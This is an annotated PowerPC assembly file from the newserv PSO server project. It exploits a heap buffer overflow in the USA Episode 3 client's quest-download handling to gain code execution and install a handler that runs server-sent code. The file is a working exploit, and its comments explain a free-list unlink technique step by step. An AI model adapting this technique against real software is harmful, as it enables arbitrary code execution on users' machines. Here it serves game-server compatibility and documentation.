Files
psopeeps-newserv/system/ppc/Episode3USAQuestBufferOverflow.s
T
2023-12-22 15:27:45 -08:00

352 lines
14 KiB
ArmAsm

# There is a buffer overflow bug in PSO Episode 3 that this program uses to
# achieve arbitrary code execution. (This bug is likely present in all versions
# of PSO, but the code here is specific to the USA version of Episode 3.) This
# is only necessary because the non-Japanese versions of Episode 3 lack the B2
# command, which is used on other console PSO versions to send patches and other
# bits of code. Here, we use a buffer overflow bug to re-implement the B2
# command, which allows the server to treat PSO Episode 3 like any other version
# of PSO with respect to patching or loading DOL files.
# For some background, PSO sends download quest files via the A6 and A7
# commands. The A6 command is used to start sending a download quest file; it
# includes the quest name, file name, and total file size. The A7 command is
# used to send a chunk of 1KB (0x400 bytes) of data, or less if it's the final
# chunk of the file. When the client receives an A6 command for a filename
# ending in .bin, it allocates a buffer of (file size + 0x48) bytes. When it
# later receives an A7 command, it copies (cmd.data_size) bytes from the command
# to position (8 + 0x400 * flag) in the buffer, then if cmd.data_size was less
# than 0x400, it marks the file as done and postprocesses it.
# However, the client neglects to check if the last chunk overflows the end of
# the buffer before copying the chunk data. In this function, we send an A6
# command with an overall file size of only 0x18 bytes, then we send a chunk of
# 0x200 or so bytes (the compiled size of the code in this file), which
# overflows past the end of the allocated buffer and overwrites part of a free
# block after the allocated buffer. The memory allocator library keeps some of
# its bookkeeping structures at the beginning of this free block, which we use
# to cause the next call to malloc() to overwrite its own return address on the
# stack. Conveniently, this call happens soon afterward, during the
# postprocessing step.
# The PSO memory allocator is a simple free-list allocator. The allocator
# maintains two linked lists of blocks: one for allocated blocks and one for
# free blocks. The list of free blocks is sorted in order of memory address, but
# the list of allocated blocks is sorted in the order they were allocated. (The
# order of the allocated block list does not matter for the allocator's
# performance or correctness.)
# Each block begins with two pointers, prev and next, which point to other
# blocks in the allocated or free list. (As with a typical doubly-linked list,
# the first block has prev == nullptr and the last block has next == nullptr;
# there is no sentinel node on either end.) After these two pointers is the
# block's size in bytes, followed by 0x14 unused bytes. The block data
# immediately follows this 0x20-byte header structure. All block sizes are
# rounded up to a multiple of 0x20 bytes.
# The malloc() routine simply searches for the first free block that has enough
# space to satisfy the request, and either splits it into an allocated and a
# free block (if the free block's size is at least 0x40 bytes more than the
# requested size), or converts the free block entirely into an allocated block
# and returns it. It is the second case that we take advantage of here.
# When we send our A7 command containing this program, the first 0x58 bytes of
# it fill the quest file data buffer. The next 0x0C bytes of it overwrite the
# header fields of the following free block (noted below in the comments), and
# the remainder of the data goes into that block's unused header fields and the
# block's data (which is also otherwise unused, since it is a free block). We
# overwrite the free block's prev and next pointers with specific nonzero values
# and overwrite the size with the exact size that the caller will request, so we
# trigger the malloc() case that does not split the free block. When that code
# attempts to remove the free block from its doubly-linked list, it writes
# block->next to block->prev->next and block->prev to block->next->prev. We set
# block->prev to the address where we want execution to jump to (the start label
# here), and block->next to the address of malloc()'s return address on the
# stack. This overwrites the return address with the start label's address, and
# overwrites the word after the start label with an address within the stack. We
# can't avoid this second write since both pointers must be non-null and the
# values and addresses written are dependent on each other, but we can just use
# a branch opcode to ignore the value that gets written into our code.
# Once we have control, we clean up the allocator state (restoring the free
# block as it was before we overwrote its header), then copy our implementation
# of the B2 command to an otherwise-unused area of memory and apply a few more
# patches. See the comments within the code below for more details.
# The entry_ptr label is not used at runtime, because this code is delivered
# through the A7 buffer overflow rather than with the B2 command; it only needs
# to be present for newserv to compile the code properly.
entry_ptr:
start:
# Execution arrives here when malloc() returns through its overwritten return
# address. The word immediately after this opcode is clobbered by malloc()'s
# unlink step before we ever run, so the first opcode must branch over it.
b resume1
# This is the value overwritten by malloc() when it attempts to remove the
# free block from its linked list
.data 0xAAAAAAAA
resume1:
# First stage of the payload: compute the real return address, then repair the
# allocator state (free block header and both list heads) that the overflow
# and the hijacked malloc() call damaged, and continue at resume2.
# We can use any of the caller-save registers (r0, r3-r12) here.
# At entry time, some registers contain useful values:
# r5: Address of the allocator instance ("lists"). This structure includes the
# allocated and free list head pointers, both of which are restored below.
# r12: Address of the malloc() function that was called. Conveniently, the
# address that we should return to is very near this location in memory.
# Compute the LR we should use to return from this function, but don't put it
# in the LR just yet - we're still going to need the LR for other shenanigans
# (the bl/mflr pairs used later to obtain addresses overwrite the LR; r11 is
# moved into the LR by the mtlr immediately before the final blr).
subi r11, r12, 0xB0 # 8038C1B8 - B0 = 8038C108
# Restore the free block whose header we had destroyed with the A7 command
# buffer overflow
# r7 = 0x815FF440, the address of the free block's header
lis r7, 0x815F
ori r7, r7, 0xF440
# r0 = 0 is reused as the null pointer for every store below
li r0, 0
stw [r7], r0 # free_block->prev = nullptr
stw [r7 + 4], r0 # free_block->next = nullptr
# r6 = 0x001E0960, the size the free block is restored to
lis r6, 0x001E
ori r6, r6, 0x0960
stw [r7 + 8], r6 # free_block->size = 0x001E0960
stw [r5 + 4], r7 # lists->free_head = free_block
# Restore lists->allocated_head and clear its prev pointer
# r6 = 0x815FF3C0, the block that was the allocated-list head before malloc()
lis r6, 0x815F
ori r6, r6, 0xF3C0
stw [r5 + 8], r6 # lists->allocated_head = orig_allocated_head
stw [r6], r0 # lists->allocated_head->prev = nullptr
# Jump over the padding and the three opaque2 words, which are data, not code
b resume2
# TODO: We can probably use this space for something useful. There must be
# exactly 20 opcodes (0x50 bytes) between resume1 and opaque2.
# The code above uses 15 of those 20 slots; the 5 directives below pad out the
# rest (each .zero presumably emits one zero word - confirm against the
# newserv assembler). Adding or removing an opcode above requires adjusting
# this padding so opaque2 stays at the same offset.
.zero
.zero
.zero
.zero
.zero
opaque2:
# This block must be exactly here (the number of opcodes above is exactly how
# many will fit in the original buffer), and the 3 words here must have
# exactly these values. This is what causes malloc to overwrite the return
# address on the stack to call this code in the first place.
# These words are data, never executed: resume1 branches over them. They sit
# 0x58 bytes after the start label (2 words at start + 20 opcodes), so with
# start at 0x815FF3E8 they land on the free block header at 0x815FF440 that
# resume1 later restores.
# prev is the address of the start label; when malloc() unlinks the block it
# stores this value through next, replacing its own return address.
.data 0x815FF3E8 # free_head->prev
# next is the address of malloc()'s return address on the stack; the unlink
# also stores this value into the word after the start label.
.data 0x80592AC4 # free_head->next
# size is the exact size the caller requests, so malloc() takes the whole
# block (the no-split case) and performs the unlink.
.data 0x00000160 # free_head->size
resume2:
# This bl is used only to obtain an address: it leaves the address of the next
# opcode (handle_B2) in the LR, which get_handle_B2_ptr reads with mflr.
# Control does not come back here; the payload returns through r11 instead.
bl get_handle_B2_ptr
# This is the code we're going to use for the B2 command handler, which we
# will copy into an unused area of memory. It's convenient to put it here and
# use a bl opcode to get its address, so this code can be minimally position-
# dependent. Note that this part of the code does not run at the time the A7
# command is received; it will run later if the client receives a B2 command.
handle_B2:
# Handler for the B2 command. If the command carries a code section, it
# applies the section's relocations, flushes the caches, calls the section and
# records its return value. It then checksums the requested memory range and
# sends both results back in a B3 command.
# Push a 0x40-byte frame and save the LR at [old r1 + 4]
mflr r0
stwu [r1 - 0x40], r1
stw [r1 + 0x44], r0
# Arguments:
# r3 = TProtocol* proto (we use this to call the send function)
# r4 = void* data
# Returns: void
# Fields read from data (offsets from r4), as used by the code below:
# +01 = byte echoed back as XX in the reply header
# +04 = code section size (read with a byte-reversed load)
# +08 = checksum address (read with a byte-reversed load)
# +0C = checksum size (read with a byte-reversed load)
# +10 = start of the code section
# Stack:
# [r1+08] = B3 XX 0C 00
# [r1+0C] = code section's return value
# [r1+10] = checksum
# [r1+14] = saved proto argument (r3)
# [r1+18] = saved data argument (r4)
# We reserved 0x40 bytes on the stack because I was lazy.
stw [r1 + 0x14], r3
stw [r1 + 0x18], r4
# Set up the reply header (B3 XX 0C 00, where XX comes from the B2 command)
lbz r5, [r4 + 1]
# Move XX into the second-highest byte: r5 = 00 XX 00 00
rlwinm r5, r5, 16, 8, 15
oris r5, r5, 0xB300
ori r5, r5, 0x0C00
stw [r1 + 0x08], r5
# If there's no code section, skip it. We also write the code section size to
# the return value field (which will be overwritten later if the size is not
# zero). This is because I'm lazy and this gives the behavior we want: the
# code return value is always zero if the code section size is zero.
# lwbrx has no immediate-offset form, so the offset goes in r6
li r6, 4
lwbrx r5, [r4 + r6] # r5 = code_size
stw [r1 + 0x0C], r5 # response.code_return_value = code_size
cmplwi r5, 0
beq handle_B2_skip_code
# Get the code section base and footer addresses
# Footer words read below (with plain lwz, so not byte-reversed):
# footer+00 = offset of the relocations list from the code base
# footer+04 = number of relocations
# footer+10 = offset from the code base of a word holding the address to call
addi r6, r4, 0x10 # r6 = code base address
add r7, r6, r5
subi r7, r7, 0x20 # r7 = footer address (code base + code size - 0x20)
# Check if there are relocations to do
lwz r8, [r7 + 4] # r8 = num relocations
cmplwi r8, 0
beq handle_B2_skip_relocations
# Execute the relocations
# The relocation count becomes the loop counter; r8 is then reused as the list
# cursor
mtctr r8
lwz r8, [r7] # r8 = relocations list offset
add r8, r8, r6 # r8 = relocations list address
subi r8, r8, 2 # Back up one space so we can use lhzu in the loop
mr r10, r6 # relocation pointer = code base address
handle_B2_relocate_again:
# Each list entry is a 16-bit count of words to advance from the previous
# relocation (or from the code base for the first entry); the word found there
# has the code base address added to it.
lhzu r9, [r8 + 2]
rlwinm r9, r9, 2, 0, 29 # r9 = next_relocation_offset * 4
add r10, r10, r9 # relocation pointer += next_relocation_offset * 4
lwz r9, [r10]
add r9, r9, r6
stw [r10], r9 # (*relocation pointer) += code base address
bdnz handle_B2_relocate_again
handle_B2_skip_relocations:
# Invalidate the caches appropriately for the newly-copied code
# r0 = 0x8000C324, the address called as flush_code
lis r0, 0x8000
ori r0, r0, 0xC324
mr r3, r6
mr r4, r5
mtctr r0
bctrl # flush_code(code_base_addr, code_section_size)
# Call the code section and put the return value (byteswapped) on the stack
# Note: flush_code only uses r3, r4, and r5, so we don't need to reload r6 or
# r7 after the above call (both are read below)
lwz r8, [r7 + 0x10]
# r8 = the word at (code base + footer[0x10]), used as the call target
# (presumably an absolute address produced by the relocations - confirm)
lwzx r8, [r8 + r6]
mtctr r8
bctrl
# stwbrx has no immediate-offset form, so the offset 0x0C goes in r8
li r8, 0x0C
stwbrx [r1 + r8], r3
handle_B2_skip_code:
# Get the checksum function args
# Reload data from the stack; r4 is not relied on after the calls above
lwz r4, [r1 + 0x18]
li r5, 0x08
lwbrx r3, [r4 + r5] # checksum addr
li r5, 0x0C
# r4 is overwritten here, so the address field had to be read first
lwbrx r4, [r4 + r5] # checksum size
# r0 = 0x8010F834, the address called as crc32
lis r0, 0x8010
ori r0, r0, 0xF834
mtctr r0
bctrl # crc32(checksum_addr, checksum_size)
li r8, 0x10
stwbrx [r1 + r8], r3
# Send the response (B3 command)
lwz r3, [r1 + 0x14]
# Load a pointer from proto+0x18, then a function pointer from offset 0x28
# of that (presumably the vtable and its send slot - confirm)
lwz r4, [r3 + 0x18]
lwz r4, [r4 + 0x28]
mtctr r4
# r4 = address of the 0x0C-byte reply built at [r1+08]..[r1+13]
addi r4, r1, 0x08
li r5, 0x0C
bctrl # TProtocol::send_command(proto, &reply_data, 0x0C)
# Clean up stack and return
lwz r0, [r1 + 0x44]
addi r1, r1, 0x40
mtlr r0
blr
get_handle_B2_ptr:
# Reached by the bl at resume2, so the LR holds the address of handle_B2.
mflr r9 # r9 = &handle_B2
# Second bl used only to obtain an address: it falls through to the next
# opcode and leaves that opcode's address in the LR. This label is also the
# end of handle_B2, so exactly these two opcodes must sit between it and
# get_handle_B2_end_ptr for the "subi 8" there to be correct.
bl get_handle_B2_end_ptr
get_handle_B2_end_ptr:
# Installs the handler: copies handle_B2 to 0x8000BD80, flushes the caches
# for the copy, and points a command handler table entry at it.
# The LR is the address of this label; the end of handle_B2 is two opcodes
# (8 bytes) earlier, at get_handle_B2_ptr.
mflr r10
subi r10, r10, 8 # r10 = pointer to end of handle_B2
# Copy handle_B2 to 8000BD80, which is normally unused by the game
lis r12, 0x8000
ori r12, r12, 0xBD80 # r12 = 0x8000BD80
# r7 = (end - start) in bytes, then shifted right by 2 to get words
sub r7, r10, r9
rlwinm r7, r7, 30, 2, 31 # r7 = number of words to copy
mtctr r7
subi r8, r12, 4 # r8 = r12 - 4 (so we can use stwu)
subi r9, r9, 4 # r9 = r9 - 4 (so we can use lwzu)
copy_handle_B2_word_again:
# The update forms pre-increment both pointers by 4 on each iteration
lwzu r0, [r9 + 4]
stwu [r8 + 4], r0
bdnz copy_handle_B2_word_again
# Invalidate the caches appropriately for the newly-copied code
# r9 = 0x8000C324 (flush_code). It is kept in r9 and reused by the mtctr r9
# opcodes in the later patch steps, which relies on flush_code not modifying
# r9.
lis r9, 0x8000
ori r9, r9, 0xC324
mtctr r9
mr r3, r12
# r4 = word count * 4 = size of the copied handler in bytes
rlwinm r4, r7, 2, 0, 29
bctrl # flush_code(copied_B2_handler, copied_B2_handler_bytes)
# Replace the command handler table entry for command 0E (which appears to be
# a legacy command and has very broken behavior) with our B2 implementation
# r5 = 0x8044F684, the address of that table entry. The command number is
# written at offset 0 and the handler address at offset 0x0C; r12 still holds
# 0x8000BD80 here, which relies on flush_code not modifying r12.
lis r5, 0x8044
ori r5, r5, 0xF684
li r0, 0x00B2
stw [r5], r0
stw [r5 + 0x0C], r12
# Patch both places in the code where command 9E is sent to make them include
# a sentinel value that newserv can use to determine if the client has already
# run the code in this file
# As before, this bl only captures an address: the LR becomes &patch_9E_1.
bl get_patch_9E_1_ptr
patch_9E_1:
# Template for the first 9E patch. These three opcodes are not executed in
# place: the preceding bl jumps over them, and get_patch_9E_1_ptr copies them
# word by word to 0x800F3338. The template must stay exactly three opcodes
# long to match that copy.
lis r4, 0x5F5C
ori r4, r4, 0xA297
stw [r1 + 0x14], r4 # Set cmd.unused1 to 0x5F5CA297 (in send_9E_long)
get_patch_9E_1_ptr:
# Copies the three patch_9E_1 opcodes over the game code at 0x800F3338 and
# flushes the caches for that range.
# r3 = 0x800F3338, the destination of the patch
lis r3, 0x800F
ori r3, r3, 0x3338
# r4 = &patch_9E_1 (the LR set by the bl that jumped here)
mflr r4
lwz r0, [r4]
stw [r3], r0
lwz r0, [r4 + 4]
stw [r3 + 4], r0
lwz r0, [r4 + 8]
stw [r3 + 8], r0
# r3 is still the destination; r9 is still the flush_code address loaded
# before the first flush of the copied handler
li r4, 0x20
mtctr r9
# NOTE(review): the 12 patched bytes (0x800F3338-0x800F3343) straddle a
# 32-byte boundary at 0x800F3340. This is only correct if flush_code covers
# every line touched by an unaligned [start, start + size) range - confirm.
bctrl # flush_code(patch_9E_1_dest, 0x20)
# Capture the address of patch_9E_2 in the LR for the second patch
bl get_patch_9E_2_ptr
patch_9E_2:
# Template for the second 9E patch. As with patch_9E_1, these three opcodes
# are not executed in place; get_patch_9E_2_ptr copies them to 0x800F3644.
# The only difference from patch_9E_1 is the stack offset of the field.
lis r4, 0x5F5C
ori r4, r4, 0xA297
stw [r1 + 0x60], r4 # Set cmd.unused1 to 0x5F5CA297 (in handle_02)
get_patch_9E_2_ptr:
# Copies the three patch_9E_2 opcodes over the game code at 0x800F3644,
# patches the A7 handler, and finally returns null to malloc()'s original
# caller.
# r3 = 0x800F3644, the destination of the patch
lis r3, 0x800F
ori r3, r3, 0x3644
# r4 = &patch_9E_2 (the LR set by the bl that jumped here)
mflr r4
lwz r0, [r4]
stw [r3], r0
lwz r0, [r4 + 4]
stw [r3 + 4], r0
lwz r0, [r4 + 8]
stw [r3 + 8], r0
li r4, 0x20
mtctr r9
bctrl # flush_code(patch_9E_2_dest, 0x20)
# Finally, patch the A7 handler function (which is on the current callstack)
# so that it does nothing else if this function returns null, which prevents
# further memory corruption. This changes a beq opcode (which never triggers
# under normal circumstances) to skip a couple more function calls, one of
# which would cause memory corruption if executed because the original buffer
# is smaller than 0x100 bytes.
# r3 = 0x8010FD8A, the low halfword of the opcode at 0x8010FD88; only that
# halfword is rewritten, to 0x0064.
lis r3, 0x8010
ori r3, r3, 0xFD8A
li r4, 0x0064
sth [r3], r4
# Clear the low 4 bits of the address before flushing (0x8010FD80)
rlwinm r3, r3, 0, 0, 27
li r4, 0x20
mtctr r9
bctrl # flush_code(patched_opcode_address & 0xFFFFFFF0, 0x20)
# Return null instead of a malloc'ed block, which triggers the conditional
# branch we just patched above
# r11 holds the return address computed at resume1 (malloc address - 0xB0);
# this relies on none of the flush_code calls having modified r11.
li r3, 0
mtlr r11
blr